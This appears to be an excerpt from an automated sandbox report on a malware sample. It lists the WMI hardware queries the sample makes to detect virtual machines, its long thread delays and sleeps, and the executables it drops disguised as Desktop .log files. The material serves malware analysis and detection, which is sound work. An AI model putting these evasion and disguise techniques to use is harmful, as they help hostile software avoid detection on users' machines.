                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeMemory allocated: D40000 memory reserve | memory write watchJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeMemory allocated: 1ACA0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeMemory allocated: 8A0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeMemory allocated: 1A6A0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeCode function: 13_2_00007FFD9C29BBE4 sldt word ptr [eax]13_2_00007FFD9C29BBE4
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 599891Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 3600000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 598672Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 598500Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 598141Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 598000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 597141Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 597010Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 596500Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 596016Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 595844Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 595516Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 595016Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 594469Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 594016Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 593813Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 593610Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 300000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 593204Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 592829Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 592579Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 592239Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 591875Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 591484Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 591047Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 590913Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 590625Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 590313Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 589969Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 589729Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 589422Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 589047Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 588704Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 588438Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 588151Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 588016Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587895Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587781Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587665Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587563Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587438Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587313Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 587200Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWindow / User API: threadDelayed 5926Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWindow / User API: threadDelayed 2819Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\EsydEbLs.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\avRZftgA.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\RUhcZACY.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\nxxgerdx.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\AFgebewE.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\vJfNUyGL.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\KxrkaJNA.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\EMydcNjR.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\OnibhGNt.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\GHBtTNNH.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\ylcWNDYf.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\RMxJvRbT.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\pzkPzahs.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\dOeQuOYP.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\hWbZPhSL.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\WixjfVXd.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\CHTNxNAz.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\pRCorSBW.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\XWBrRjTb.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\sYzxNlvS.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\jHHpWudE.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\dxDIAclw.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\kekpPWli.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\PgdUomGa.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\QpUJDpSo.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\aMYstPaD.logJump to dropped file
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\tqaFGXil.logJump to dropped file
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeDropped PE file which has not been started: C:\Users\user\Desktop\TOksRAfO.logJump to dropped file
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23429
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exe TID: 4592Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 6876Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -599891s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 6964Thread sleep time: -25200000s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -598672s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -598500s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -598141s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -598000s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -597485s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -597141s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -597010s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -596500s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -596016s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -595844s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -595516s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -595016s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -594469s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -594016s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -593813s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -593610s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 6964Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -593204s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -592829s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -592579s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -592239s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -591875s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -591484s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -591047s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -590913s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -590625s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -590313s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -589969s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -589729s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -589422s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -589047s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -588704s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -588438s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -588151s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -588016s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587895s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587781s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587665s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587563s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587438s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587313s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe TID: 2664Thread sleep time: -587200s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0036A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0036A69B
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0037C220
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0037E6A3 VirtualQuery,GetSystemInfo,0_2_0037E6A3
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 599891Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 3600000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 598672Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 598500Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 598141Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 598000Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 597485Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 597141Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 597010Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 596500Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeThread delayed: delay time: 596016Jump to behavior
